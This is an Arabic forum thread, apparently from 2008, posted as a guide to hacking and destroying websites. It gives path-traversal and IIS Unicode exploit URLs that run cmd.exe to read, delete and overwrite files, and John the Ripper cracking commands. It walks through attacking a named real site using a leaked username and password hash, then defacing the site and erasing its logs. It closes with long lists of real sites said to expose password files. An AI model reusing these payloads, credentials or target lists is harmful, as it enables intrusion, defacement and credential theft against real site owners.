المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع
طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
استغلال العيب في ملفات
Cgi & Perl
للوصول الى
etc/passwd

اولا: سناخذ الثغرات من نوع
Show Files
اولا عند وجود هذا الملف
/cgi-bin/apexec.pl?
الباسوورد علينا استغلال هذه الثغرة للوصول الى
http://www.target.com/cgi-bin/apexe...te=../../../../
../../../../../etc/resolv.conf%00.html&passurl=/category/
مع امكانية تغيير
path
بالملف المراد
هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي
/cgi-bin/hsx.cgi?
عند وجود هذا الملف في
/cgi-bin/
طبق الثغرة التالية
http://www.Target.com/cgi-bin/hsx.c..../etc/passwd%00
الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات
مثل /cgi-bin/hsx.cgi?
وعند وجوده يتم تطبيق ثغرته.
-------------------------------------------------------------------
4 - شرح ثغرة اي اي اس وكيفية استغلالها:

IIS = Inetnet Information Service
و نستخدم ثغراته المعروفه باليوانا مش محترم وقليل الادبودز
Unicodes
و هي كثيره جدا و انا اعني ما اقول
مثل :
**********************************************
http://www.xxxx.com/scripts/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/scripts/..&Aacu.../cmd.exe?/c+dir +c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
*************************************************
طريقه استغلال ثغرات اي اي اس بكذى طريقه

يتم تطبيق هذه الثغرات مباشرة من المتصفح مستغلين ملف ال
cmd.exe
لتنفيذ اوامرنا
مثال للثغره و تطبيق الاوامر:
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
-----------------------------------------------------------------------------------
امر انشاء دليل جديد
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJ
-----------------------------------------------------------------------------------
امر الغاء دليل
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJ
-----------------------------------------------------------------------------------
الامر المستخدم للنسخ
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe
-----------------------------------------------------------------------------------
الامر المستخدم للحذف
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp
-----------------------------------------------------------------------------------
الامر المستخدم لتغيير مسمى الملف
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm
-----------------------------------------------------------------------------------
لامر المستخدم لرؤية محتويات الملف
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htm
-----------------------------------------------------------------------------------
الامر المستخدم للكتابة داخل أي ملف
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt
-----------------------------------------------------------------------------------
ملحوظه :
--------
قد نحتاج الى تغيير مسمى الدليل بحيث يكون
msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin

و الان لتغيير الصفحه الاولى لموقع لابد من :
الكتابه على الصفحه الرئيسيه مستخدمين الامر
echo
برفع صفحتك الشخصيه بواسطة برنامج ال
TFTP
طريقة الكتابه على الملف الرئيسي للموقع
index.htm
باستخدام الامر
echo
------------------------
مبدئيا لابد من نسخ ملف
cmd.exe
الي مجلد
scripts
بهذا الشكل على سبيل المثال :
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe
-----------------------------------------------------------------------------------
الرجوع الى أعلى الصفحة اذهب الى الأسفل
اسامة العرابى
عضو فعال
عضو فعال
اسامة العرابى


ذكر
الابراج : الثور العمر : 36
عدد الرسائل : 469
تاريخ التسجيل : 30/04/2008
الوظيفه : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Pilot10
الهوايات : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Painti10
درجه احترام العضو : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip 111010
اوسمه 3 : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
نقاط : 6133
السٌّمعَة : 1

جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
مُساهمةموضوع: رد: جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip   جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Icon_minitimeالإثنين يونيو 09, 2008 2:47 am

-(شرح البرامج)
1- شرح برنامج جون ذاريبر

حط البرنامج في السي
ملاحظة احفظ الباسوورد في نفس ملف البرنامج في ملف
.txt
وتسميه
password
عشان تمشي مع الشرح
-=-=-=-=-=-=-=-=-=-=-=-
س:\البرنامج كيف يشتغل؟
البرنامج يشتغل على الدوس ادخل على الدوس واكتب
cd..
الين يصير شكله كذا
<:c
اكتب john
الحين ناقصك اوامر
ماهي اوامر البرنامج؟
-=-=-=-=-=-=-=-=-=-=-=-
1-امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر وصيغته كالتالي:
john -w:wordlist.txt password.txt
ملف
wordlist
هي كلمات السر المحتمله و
password
كلمة السر المشفرة
(لا انصح بهذا الاختيار)
-=-=-=-=-=-=-=-=-=-=-=-
2-امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم وصيغته:
john -single passwd.txt
-=-=-=-=-=-=-=-=-=-=-=-
3-امر يبحث لك عن الارقام فقط وصيغتة:
john -iD:igits passwd.txt
-=-=-=-=-=-=-=-=-=-=-=-
4-امر يبحث عن الحروف الصغيرة:
john -i:Alpha passwd.txt
-=-=-=-=-=-=-=-=-=-=-=-
5-امر يبحث لك عن جميع الاحتمالات الممكنة وصيغتة:
john -i:all passwd.txt
هذا الخيار اذا فشلت فيها كلها لانه طويل بس انه افضل اختيار
-=-=-=-=-=-=-=-=-=-=-=-
طيب انا اخترت اخر واحد وقعد البرنامج ساعة مافك ولا شئ وانا ماني فاضي له بخلي الكمبيوتر شغال وش اسوي؟
عندي الحل اضغط كنترول + شفت +سي او
كنترول+سي
ctrl+shift+c
ctrl+c
-=-=-=-=-=-=-=-=-=-=-=-
كيف اكمل ؟
اكتب
john -restore
وهو يكمل
-------------------------------------------------------------------------

4-( نخترق موقع مع بعض)
اول شي خلينا بالمواقع العادية مو نخترق الياهو مرة وحدة علما بأن اختراق المواقع العاديه سهل.
الحين بعد ما قرأنا الدرس الكبير هذا وفهمناه نبي نطبق اللي فهمناه سوف نخترق موقع مع بعض.
--------------------------
البرامج اللازمة:
Jonh the rippar
WS_FTP pro
-------------------------
بسم الله نبدأ:
1- الحين انا ما راح اتعبكم بالبحث عن موقع به ثغرات انا راح اعطيكم موقع فيه ثغرة وراح ننفذها وهو:
http://www.dsg-art.com/
هذا الموقع مصاب بثغرة ملف الباسوورد اللي هي:
wwwboard/passwd.txt
الحين ننفذ الثغرة
http://www.dsg-art.com/wwwboard/passwd.txt
علشان يطلع لينا اليوزر نيم والباسوورد:
jc:GXQ4cN0fhbptw
jc
اليوزر نيم
GXQ4cN0fhbptw
هذا الباسوورد بس مشفر شلون نفك تشفيره علشان نحصل على الباسوورد الاصلي؟؟؟
طبعا ببرنامج جون ذاريبر والشرح ماله فوق.
اوكي فكينا التشفير والحين صار معانا الباسوورد واليوزر نيم مال الموقع خلاص تمت عمليه الاختراق.
الحين نبي نكتب تم الاختراق بواسطة دارك بوي شلون ؟
طبعا ببرنامج الفتب
WS_FTP PRO
اوكي الحين نحط الباسوورد واليوزر نيم بالبرنامج وندخل على الريموت مال الموقع .
الحين اذا تبي تدمر الموقع طبعا تمحي الملفات الحين في بين الملفات ملف اسمه
index.html
هذا ملف الصفحة الرئيسية للموقع الحين احنا نكون مسويين الملف اللي كاتبين فيه تم اختراق هذا الموقع بواسطة دارك بوي من قبل الحين نمحي الملف اندكس مال الموقع وندخل الملف مالنا من الكومبيوتر بعد اختيار مكانه على الكومبيوتر.
واللي ما يعرف يسوي صفحة اندكس يقولي انا اعلمه وكمثال عليها انا مسوي صفحة علشان بس اخترق موقع احطها وهي:
www.geocities.com/hasssssona
خلاص تم اختراق الموقع وترك رساله لصاحبه تم اختراق الموقع ....
الحين علشان لا يعرفنا صاحب الموقع نروح ونمسح ملفات اللوقو اللي شرحهها فوق.
الان بامكان اي احد قرأهذا الدرس اختراق مواقع عادية بس مو مثل الياهو.
-----------------------------------------------------------------------
الرجوع الى أعلى الصفحة اذهب الى الأسفل
اسامة العرابى
عضو فعال
عضو فعال
اسامة العرابى


ذكر
الابراج : الثور العمر : 36
عدد الرسائل : 469
تاريخ التسجيل : 30/04/2008
الوظيفه : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Pilot10
الهوايات : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Painti10
درجه احترام العضو : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip 111010
اوسمه 3 : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
نقاط : 6133
السٌّمعَة : 1

جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
مُساهمةموضوع: رد: جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip   جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Icon_minitimeالإثنين يونيو 09, 2008 2:51 am

-----------------------------------------------------------------------
5-(مواقع بها ثغرات)



.txt
http://www.unionmen.com/forum/passwd.txt
http://facyt.uc.edu.ve/foros/passwd.txt
http://www.ku.edu/~philos/courses/wwwboard3/passwd.txt
http://ponce.inter.edu/forums/passwd.txt
http://students.washington.edu/msa/...ulum/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://www.motosalvagedirectory.com/forums/passwd.txt
http://gazissax.best.vwh.net/alsira...oard/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.inece.org/ozone/passwd.txt
http://www.usd.edu/phys/courses/ast...bord/passwd.txt
http://cds.unina.it/~tuccillo/passwd.txt
http://ponce.inter.edu/forums/prueba/passwd.txt
http://paradigm-dc.hypermart.net/passwd.txt
http://clonetheory.virtualave.net/passwd.txt
http://www.uni-ulm.de/LiLL/foren/forum1/passwd.txt
http://www.fh-potsdam.de/~potsmods/...ster/passwd.txt
http://www.endicott.edu/staff/kuhn/...9812/passwd.txt
http://www.artintheschool.org/forum/passwd.txt
http://www.utexas.edu/depts/grg/vir...sion/passwd.txt
http://www.mag7.net/floor/passwd.txt
http://www.urban-forestry.com/forum/passwd.txt
http://pages.globetrotter.net/lhibb...oard/passwd.txt
http://wealth-connection.com/bbs/passwd.txt
http://xipe.insp.mx/wwwboard/passwd.txt
http://facyt.uc.edu.ve/foros/passwd.txt
http://c25c250.best.vwh.net/restricted/passwd.txt
http://www.sandiego.edu/~deroche/case2/passwd.txt
http://www.sandiego.edu/~deroche/group6p/passwd.txt
http://home.gwi.net/~actonfd/bboard/passwd.txt
http://pages.stern.nyu.edu/~rgarud/helpchat/passwd.txt
http://acpon1.ponce.inter.edu/forums/prueba/passwd.txt
http://www.gugten.com/_pub/ARPA/forum/passwd.txt
http://library.thinkquest.org/~1013...dmin/passwd.txt
ثغرات فرونت بيج:
www.ebc.uu.se/evolmuseum/_vti_pvt/
http://www.ebc.uu.se/klubban/_vti_pvt/
http://police.hypermart.net/_vti_pvt/
http://www.seanachie.com/_vti_pvt/
http://www.ahpcc.unm.edu/~aroberts/main/_vti_pvt/
http://www.ahpcc.unm.edu/~aroberts/main/main/_vti_pvt/
http://www.tpeditor.com/_vti_pvt/
http://www.sussex.ac.uk/tcmr/pgp/pgp2/_vti_pvt/
http://www.sussex.ac.uk/Units/IRPol/MAnews/_vti_pvt/
http://members.aol.com/r1953young/_vti_pvt/
http://www.lic.wisc.edu/shapingdane/_vti_pvt/
http://www.gvc.gu.se/ngeo/ng-hem/china/_vti_pvt/
http://www.robertsmyth.leics.sch.uk/_vti_pvt/
http://www.www.nr/My%20Webs/_vti_pvt/
http://siteventos.org.gt/tal_1/_vti_pvt/
http://siteventos.org.gt/redes/_vti_pvt/
http://virtation.com/_vti_pvt/ http://www.lu.lv/jauna/strukt/jgs/_vti_pvt/
http://www.jmtrep.hpg.com.br/_vti_pvt/
http://alpha.tamu.edu/public/jae/_vti_pvt/
http://homepages.newnet.co.uk/netwo...k2000/_vti_pvt/ http://dnr.state.il.us/legislation/isah/_vti_pvt/
http://www.rrk-berlin.de/rrkweb/chirurgie/_vti_pvt/
http://www.jtr.gov.my/fik/_vti_pvt/
http://ww1.baywell.ne.jp/fpweb/drlatham/_vti_pvt/
http://www.wms-access.com/Photo%20Gallery/_VTI_PVT/
http://www.lfp.cz/primaire/_vti_pvt/
http://www.zs3zab.cz/_vti_pvt/service.pwd
http://pages.citenet.net/users/ctmx...pvt/service.pwd
http://ftp.scu.edu.tw/_vti_pvt/service.pwd
http://orion.ifsi.rm.cnr.it/meeting...pvt/service.pwd
الرجوع الى أعلى الصفحة اذهب الى الأسفل
اسامة العرابى
عضو فعال
عضو فعال
اسامة العرابى


ذكر
الابراج : الثور العمر : 36
عدد الرسائل : 469
تاريخ التسجيل : 30/04/2008
الوظيفه : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Pilot10
الهوايات : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Painti10
درجه احترام العضو : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip 111010
اوسمه 3 : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
نقاط : 6133
السٌّمعَة : 1

جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
مُساهمةموضوع: رد: جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip   جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Icon_minitimeالإثنين يونيو 09, 2008 2:53 am

تحياتى لسيد الشيخ


ويارب تفهم الليلة
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» اختراق ايميل حسني مبارك
» الانترنت و المواقع الاباحية
» تصفح المواقع بحرية و بدون انترنت
» المواقع الرسمية لأندية الدورى الأسبانى
» قائمة بأسماء المواقع التي تسمح برفع الملفات الكبيرة والملفات الصوتية

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
الجسر :: شارع الدون لود :: منتدى الكمبيوتر و البرامج-
انتقل الى: